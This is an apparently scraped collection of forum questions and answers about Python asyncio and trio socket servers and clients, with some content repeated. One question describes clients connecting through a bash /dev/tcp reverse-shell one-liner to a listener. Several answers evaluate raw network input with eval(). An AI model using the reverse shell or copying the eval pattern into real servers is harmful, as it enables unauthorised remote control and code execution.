Python simple socket client/server using asyncio - python

I would like to re-implement my code using asyncio coroutines instead of multi-threading.
server.py
def handle_client(client):
request = None
while request != 'quit':
request = client.recv(255).decode('utf8')
response = cmd.run(request)
client.send(response.encode('utf8'))
client.close()
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('localhost', 15555))
server.listen(8)
try:
while True:
client, _ = server.accept()
threading.Thread(target=handle_client, args=(client,)).start()
except KeyboardInterrupt:
server.close()
client.py
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.connect(('localhost', 15555))
request = None
try:
while request != 'quit':
request = input('>> ')
if request:
server.send(request.encode('utf8'))
response = server.recv(255).decode('utf8')
print(response)
except KeyboardInterrupt:
server.close()
I know there are some appropriate asynchronous network librairies to do that. But I just want to only use asyncio core library on this case in order to have a better understanding of it.
It would have been so nice to only add async keyword before handle client definition... Here a piece of code which seems to work, but I'm still confused about the implementation.
asyncio_server.py
def handle_client(client):
request = None
while request != 'quit':
request = client.recv(255).decode('utf8')
response = cmd.run(request)
client.send(response.encode('utf8'))
client.close()
def run_server(server):
client, _ = server.accept()
handle_client(client)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('localhost', 15555))
server.listen(8)
loop = asyncio.get_event_loop()
asyncio.async(run_server(server))
try:
loop.run_forever()
except KeyboardInterrupt:
server.close()
How adapt this in the best way and using async await keywords.

The closest literal translation of the threading code would create the socket as before, make it non-blocking, and use asyncio low-level socket operations to implement the server. Here is an example, sticking to the more relevant server part (the client is single-threaded and likely fine as-is):
import asyncio, socket
async def handle_client(client):
loop = asyncio.get_event_loop()
request = None
while request != 'quit':
request = (await loop.sock_recv(client, 255)).decode('utf8')
response = str(eval(request)) + '\n'
await loop.sock_sendall(client, response.encode('utf8'))
client.close()
async def run_server():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('localhost', 15555))
server.listen(8)
server.setblocking(False)
loop = asyncio.get_event_loop()
while True:
client, _ = await loop.sock_accept(server)
loop.create_task(handle_client(client))
asyncio.run(run_server())
The above works, but is not the intended way to use asyncio. It is very low-level and therefore error-prone, requiring you to remember to set the appropriate flags on the socket. Also, there is no buffering, so something as simple as reading a line from the client becomes a tiresome chore. This API level is really only intended for implementors of alternative event loops, which would provide their implementation of sock_recv, sock_sendall, etc.
Asyncio's public API provides two abstraction layers intended for consumption: the older transport/protocol layer modeled after Twisted, and the newer streams layer. In new code, you almost certainly want to use the streams API, i.e. call asyncio.start_server and avoid raw sockets. That significantly reduces the line count:
import asyncio, socket
async def handle_client(reader, writer):
request = None
while request != 'quit':
request = (await reader.read(255)).decode('utf8')
response = str(eval(request)) + '\n'
writer.write(response.encode('utf8'))
await writer.drain()
writer.close()
async def run_server():
server = await asyncio.start_server(handle_client, 'localhost', 15555)
async with server:
await server.serve_forever()
asyncio.run(run_server())

I have read the answers and comments above, trying to figure out how to use the asyncio lib for sockets.
As it often happens with Python, the official documentation along with the examples is the best source of useful information.
I got understanding of Transports and Protocols (low-level API), and Streams (high-level API) from the examples presented in the end of the support article.
For example, TCP Echo Server:
import asyncio
class EchoServerProtocol(asyncio.Protocol):
def connection_made(self, transport):
peername = transport.get_extra_info('peername')
print('Connection from {}'.format(peername))
self.transport = transport
def data_received(self, data):
message = data.decode()
print('Data received: {!r}'.format(message))
print('Send: {!r}'.format(message))
self.transport.write(data)
print('Close the client socket')
self.transport.close()
async def main():
# Get a reference to the event loop as we plan to use
# low-level APIs.
loop = asyncio.get_running_loop()
server = await loop.create_server(
lambda: EchoServerProtocol(),
'127.0.0.1', 8888)
async with server:
await server.serve_forever()
asyncio.run(main())
and TCP Echo Client:
import asyncio
class EchoClientProtocol(asyncio.Protocol):
def __init__(self, message, on_con_lost):
self.message = message
self.on_con_lost = on_con_lost
def connection_made(self, transport):
transport.write(self.message.encode())
print('Data sent: {!r}'.format(self.message))
def data_received(self, data):
print('Data received: {!r}'.format(data.decode()))
def connection_lost(self, exc):
print('The server closed the connection')
self.on_con_lost.set_result(True)
async def main():
# Get a reference to the event loop as we plan to use
# low-level APIs.
loop = asyncio.get_running_loop()
on_con_lost = loop.create_future()
message = 'Hello World!'
transport, protocol = await loop.create_connection(
lambda: EchoClientProtocol(message, on_con_lost),
'127.0.0.1', 8888)
# Wait until the protocol signals that the connection
# is lost and close the transport.
try:
await on_con_lost
finally:
transport.close()
asyncio.run(main())
Hope it help someone searching for simple explanation of asyncio.

Related

Keep indefinite connections open on TCP server with asyncio streams?

I'm trying to understand how to use asyncio streams for multiple connections that will keep sending messages until a predefined condition or a socket timeout. Looking at Python docs, they provide the following example for a TCP server based on asyncio streams:
import asyncio
async def handle_echo(reader, writer):
data = await reader.read(100)
message = data.decode()
addr = writer.get_extra_info('peername')
print(f"Received {message!r} from {addr!r}")
print(f"Send: {message!r}")
writer.write(data)
await writer.drain()
print("Close the connection")
writer.close()
async def main():
server = await asyncio.start_server(
handle_echo, '127.0.0.1', 8888)
addrs = ', '.join(str(sock.getsockname()) for sock in server.sockets)
print(f'Serving on {addrs}')
async with server:
await server.serve_forever()
asyncio.run(main())
What I'm trying to do is more complex and it looks more like so (a lot of it is pseudocode, written in capital letters or with implementation omitted):
import asyncio
async def io_control(queue):
while true:
...
# do I/O control in this function ...
async def data_processing(queue):
while true:
...
# perform data handling
async def handle_data(reader, writer):
data = await reader.read()
message = data.decode()
addr = writer.get_extra_info('peername')
print(f"Received {message!r} from {addr!r}")
#do stuff with a queue - pass messages to other two async functions as needed
#keep open until something happens
if(ERROR or SOCKET_TIMEOUT):
writer.close()
async def server(queue):
server = await asyncio.start_server(
handle_data, '127.0.0.1', 8888)
addrs = ', '.join(str(sock.getsockname()) for sock in server.sockets)
print(f'Serving on {addrs}')
async with server:
await server.serve_forever()
async def main():
queue_io = asyncio.Queue()
queue_data = asyncio.Queue()
asyncio.run(server(queue_data))
asyncio.run(data_handling(queue_data))
asyncio.run(io_control(queue_io))
asyncio.run(main())
Does this look feasible? I'm not used to working with co-routines (I'm coming from more of a multi-threading paradigm), so I'm not sure if what I'm doing is right or if I have to explicitly include yields or do any extra stuff.
If I understand correctly, you just need the TCP server to be able to handle multiple concurrent connections. The start_server function should already give you everything you need.
The first parameter client_connected_cb is a coroutine function called whenever a client establishes a connection. If you introduce a loop into that function (in your example code handle_data), you can keep the connection open until some criterion is met. What conditions exactly should lead to closing the connection is up to you, and the implementation details will obviously depend on that. The simplest approach I can imagine is something like this:
import asyncio
import logging
log = logging.getLogger(__name__)
async def handle_data(reader, writer):
while True:
data = (await reader.readline()).decode().strip()
if not data:
log.debug("client disconnected")
break
response = await your_data_processing_function(data)
writer.write(response.encode())
await writer.drain()
...
async def main():
server = await asyncio.start_server(handle_data, '127.0.0.1', 8888)
async with server:
await server.serve_forever()
if __name__ == '__main__':
asyncio.run(main())
There is theoretically no limit for the number of concurrent connections.
If your client_connected_cb is a coroutine function, each new connection will schedule a new task for the event loop. That is where the concurrency comes from. The magic then happens at the point of awaiting new data from the client; that is where the event loop can switch execution to another coroutine. All this happens behind the scenes, so to speak.
If you want to introduce a timeout, you could wrap the awaitable readline coroutine in a wait_for for example and then catch the TimeoutError exiting the loop.
Hope this helps.

how do i switch between connected clients with asyncio sockets

I am trying to make a socket server that's able to have multiple clients connected using the asyncio sockets and is able to easily switch between which client it communicates while still having all the clients connected. I thought there would be some type of FD of the clients like there is in sockets, but I looked through the docs and did not find anything, or I missed it.
Here is my server code:
import socket
import asyncio
host = "localhost"
port = 9998
list_of_auths = ['desktop-llpeu0p\\tomiss', 'desktop-llpeu0p\\tomisss',
'desktop-llpeu0p\\tomissss', 'desktop-llpeu0p\\tomisssss']
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print('socket initiated.')
confirmed = 'CONFIRMED'
deny = 'denied'
#(so i dont forget) to get recv in async do: var = (await reader.read(4096)).decode('utf-8') if -1 then it will read all
#(so i dont forget) to write sendall do: writer.write(var.encode('utf-8')) should be used with await writer.drain()
async def handle_client(reader, writer):
idrecv = (await reader.read(255)).decode('utf-8')
if idrecv in list_of_auths:
writer.write(confirmed.encode('utf-8'))
else:
writer.write(deny.encode('utf-8'))
writer.close()
request = None
while request != 'quit':
print("second checkpoint")
writer.close()
async def run_server():
print("first checkpoint")
server = await asyncio.start_server(handle_client, host, port)
async with server:
await server.serve_forever()
asyncio.run(run_server())
This code allows multiple clients to connect at once; However, it only lets me communicate with the last one that connected.
I would suggest to implement it like so:
class SocketHandler(asyncio.Protocol):
def __init__(self):
asyncio.Protocol.__init__(self)
self.transport = None
self.peername = None
# your other code
def connection_made(self, transport):
""" incoming connection """
global ALL_CONNECTIONS
self.transport = transport
self.peername = transport.get_extra_info('peername')
ALL_CONNECTIONS.append(self)
# your other code
def connection_lost(self, exception):
self.close()
# your other code
def data_received(self, data):
# your code handling incoming data
def close(self):
try:
self.transport.close()
except AttributeError:
pass
# global list to store all connections
ALL_CONNECTIONS = []
def send_to_all(message):
""" sending a message to all connected clients """
global ALL_CONNECTIONS
for sh in ALL_CONNECTIONS:
# here you can also check sh.peername to know which client it is
if sh.transport is not None:
sh.transport.write(message)
port = 5060
loop = asyncio.get_event_loop()
coro = loop.create_server(SocketHandler, '', port)
server = loop.run_until_complete(coro)
loop.run_forever()
This way, each connection to the server is represented by an instance of SocketHandler. Whenever you process some data inside this instance, you know which client connection it is.

How can i send socket asynchronously? [duplicate]

I would like to re-implement my code using asyncio coroutines instead of multi-threading.
server.py
def handle_client(client):
request = None
while request != 'quit':
request = client.recv(255).decode('utf8')
response = cmd.run(request)
client.send(response.encode('utf8'))
client.close()
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('localhost', 15555))
server.listen(8)
try:
while True:
client, _ = server.accept()
threading.Thread(target=handle_client, args=(client,)).start()
except KeyboardInterrupt:
server.close()
client.py
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.connect(('localhost', 15555))
request = None
try:
while request != 'quit':
request = input('>> ')
if request:
server.send(request.encode('utf8'))
response = server.recv(255).decode('utf8')
print(response)
except KeyboardInterrupt:
server.close()
I know there are some appropriate asynchronous network librairies to do that. But I just want to only use asyncio core library on this case in order to have a better understanding of it.
It would have been so nice to only add async keyword before handle client definition... Here a piece of code which seems to work, but I'm still confused about the implementation.
asyncio_server.py
def handle_client(client):
request = None
while request != 'quit':
request = client.recv(255).decode('utf8')
response = cmd.run(request)
client.send(response.encode('utf8'))
client.close()
def run_server(server):
client, _ = server.accept()
handle_client(client)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('localhost', 15555))
server.listen(8)
loop = asyncio.get_event_loop()
asyncio.async(run_server(server))
try:
loop.run_forever()
except KeyboardInterrupt:
server.close()
How adapt this in the best way and using async await keywords.
The closest literal translation of the threading code would create the socket as before, make it non-blocking, and use asyncio low-level socket operations to implement the server. Here is an example, sticking to the more relevant server part (the client is single-threaded and likely fine as-is):
import asyncio, socket
async def handle_client(client):
loop = asyncio.get_event_loop()
request = None
while request != 'quit':
request = (await loop.sock_recv(client, 255)).decode('utf8')
response = str(eval(request)) + '\n'
await loop.sock_sendall(client, response.encode('utf8'))
client.close()
async def run_server():
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('localhost', 15555))
server.listen(8)
server.setblocking(False)
loop = asyncio.get_event_loop()
while True:
client, _ = await loop.sock_accept(server)
loop.create_task(handle_client(client))
asyncio.run(run_server())
The above works, but is not the intended way to use asyncio. It is very low-level and therefore error-prone, requiring you to remember to set the appropriate flags on the socket. Also, there is no buffering, so something as simple as reading a line from the client becomes a tiresome chore. This API level is really only intended for implementors of alternative event loops, which would provide their implementation of sock_recv, sock_sendall, etc.
Asyncio's public API provides two abstraction layers intended for consumption: the older transport/protocol layer modeled after Twisted, and the newer streams layer. In new code, you almost certainly want to use the streams API, i.e. call asyncio.start_server and avoid raw sockets. That significantly reduces the line count:
import asyncio, socket
async def handle_client(reader, writer):
request = None
while request != 'quit':
request = (await reader.read(255)).decode('utf8')
response = str(eval(request)) + '\n'
writer.write(response.encode('utf8'))
await writer.drain()
writer.close()
async def run_server():
server = await asyncio.start_server(handle_client, 'localhost', 15555)
async with server:
await server.serve_forever()
asyncio.run(run_server())
I have read the answers and comments above, trying to figure out how to use the asyncio lib for sockets.
As it often happens with Python, the official documentation along with the examples is the best source of useful information.
I got understanding of Transports and Protocols (low-level API), and Streams (high-level API) from the examples presented in the end of the support article.
For example, TCP Echo Server:
import asyncio
class EchoServerProtocol(asyncio.Protocol):
def connection_made(self, transport):
peername = transport.get_extra_info('peername')
print('Connection from {}'.format(peername))
self.transport = transport
def data_received(self, data):
message = data.decode()
print('Data received: {!r}'.format(message))
print('Send: {!r}'.format(message))
self.transport.write(data)
print('Close the client socket')
self.transport.close()
async def main():
# Get a reference to the event loop as we plan to use
# low-level APIs.
loop = asyncio.get_running_loop()
server = await loop.create_server(
lambda: EchoServerProtocol(),
'127.0.0.1', 8888)
async with server:
await server.serve_forever()
asyncio.run(main())
and TCP Echo Client:
import asyncio
class EchoClientProtocol(asyncio.Protocol):
def __init__(self, message, on_con_lost):
self.message = message
self.on_con_lost = on_con_lost
def connection_made(self, transport):
transport.write(self.message.encode())
print('Data sent: {!r}'.format(self.message))
def data_received(self, data):
print('Data received: {!r}'.format(data.decode()))
def connection_lost(self, exc):
print('The server closed the connection')
self.on_con_lost.set_result(True)
async def main():
# Get a reference to the event loop as we plan to use
# low-level APIs.
loop = asyncio.get_running_loop()
on_con_lost = loop.create_future()
message = 'Hello World!'
transport, protocol = await loop.create_connection(
lambda: EchoClientProtocol(message, on_con_lost),
'127.0.0.1', 8888)
# Wait until the protocol signals that the connection
# is lost and close the transport.
try:
await on_con_lost
finally:
transport.close()
asyncio.run(main())
Hope it help someone searching for simple explanation of asyncio.

How can I accept new connection requests in the background?

I have the server which accepts connection requests from clients. Clients send connection requests using this command: bash -i > /dev/tcp/ip/port 0<&1 1>&1. I want my server to instantly accept new connection requests and log them to console but I don't know how. In the code below there is while loop. As we can see command_accept() need to finish itself for client_accept() to start. That means I always need to pass some command to accept new client requests. I need client_accept() to be always running in the background.
I tried to set a time limit to my input but that's not a solution I need. Also I tried different libraries for asynchronous programming though I'm not sure I'm doing this correctly.
import socket
import time
import sys
host = '127.0.0.1'
port = 1344
id_counter = 0
server = socket.socket()
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.settimeout(0.1)
server.bind((host, port))
server.listen()
clients = {}
def client_accept(server):
while True:
try:
conn, addr = server.accept()
global id_counter
id_counter += 1
clients[id_counter] = (conn, addr)
print(f'{time.ctime()} New client [ID {id_counter}] with address {str(addr[0])}:{str(addr[1])}')
except socket.timeout:
break
def command_accept():
command = input('server > ')
#** don't pay attention **#
if command == 'exit':
sys.exit()
else:
print(f'command {command} accepted!')
while True:
command_accept()
client_accept(server)
Expected result: I don't pass anything to the input in command_accept and yet if new client sent request then the server will instantly accept it and print something like New client [ID 1] with address 127.0.0.1:45431.
Try to do that with socket.io and Threading, so if the socket got a ON_CONNECT event you can just push the information in a list and print it to the console.
as an excuse to experiment with the trio async library I ported your code to it
start by defining a simple class for client connections and the code to keep track of them:
from sys import stderr
from itertools import count
class Client:
def __init__(self, stream):
self.stream = stream
async def run(self):
lines = LineReader(self.stream)
while True:
line = (await lines.readline()).decode('ascii')
if not line or line.strip().casefold() in {'quit', 'exit'}:
await self.stream.send_all(b'bye!\r\n')
break
resp = f'got {line!r}'
await self.stream.send_all(resp.encode('ascii') + b'\r\n')
CLIENT_COUNTER = count()
CLIENTS = {}
async def handle_client(stream):
client_id = next(CLIENT_COUNTER)
client = Client(stream)
async with stream:
CLIENTS[client_id] = client
try:
await client.run()
except Exception as err:
print('client failed', err, file=stderr)
finally:
del CLIENTS[client_id]
LineReader comes from here: https://stackoverflow.com/a/53576829/1358308
next we can define the server stdin processing:
async def handle_local(nursery):
while True:
try:
command = await async_input('server > ')
except EOFError:
command = 'exit'
if command == 'exit':
nursery.cancel_scope.cancel()
elif command == 'list':
for id, client in CLIENTS.items():
print(id, client.stream.socket.getpeername())
else:
print(f'unknown command {command!r}')
check out the docs for info about nurseries
this uses a utility function to wrap input up into an async function.
import trio
async def async_input(prompt=None):
return await trio.run_sync_in_worker_thread(
input, prompt, cancellable=True)
then we define code to tie all the pieces together:
SERVE_HOST = 'localhost'
SERVE_PORT = 1344
async def async_main():
async with trio.open_nursery() as nursery:
nursery.start_soon(handle_local, nursery)
await trio.serve_tcp(
handle_client,
port=SERVE_PORT, host=SERVE_HOST,
handler_nursery=nursery)
trio.run(async_main)
some more links/references (by trio's author):
tutorial echo server
motivation behind the trio library

Pythonic asyncio communication with unreliable servers

Is there a standard pattern for using asyncio to poll intermittent servers?
Take the following example: a client that reads every second from an unreliable TCP server. Without error handling, the async/await notation looks great:
class BasicTCPClient(object):
"""TCP client without error handling."""
def __init__(self, ip, port):
self.ip = ip
self.port = port
async def connect(self):
reader, writer = await asyncio.open_connection(self.ip, self.port)
self.connection = {'reader': reader, 'writer': writer}
async def get(self, request):
self.connection['writer'].write(request.encode())
return await self.connection['reader'].readuntil(b'\n')
async def read():
client = BasicTCPClient('ip', 8000)
await client.connect()
while True:
print(await client.get('request'))
await asyncio.sleep(1)
ioloop = asyncio.get_event_loop()
try:
ioloop.run_until_complete(read())
except KeyboardInterrupt:
pass
But this doesn't handle disconnecting/reconnecting well. I have a working solution, but it's approaching 100 LOC and negates all the elegance of async/await.

Categories

Resources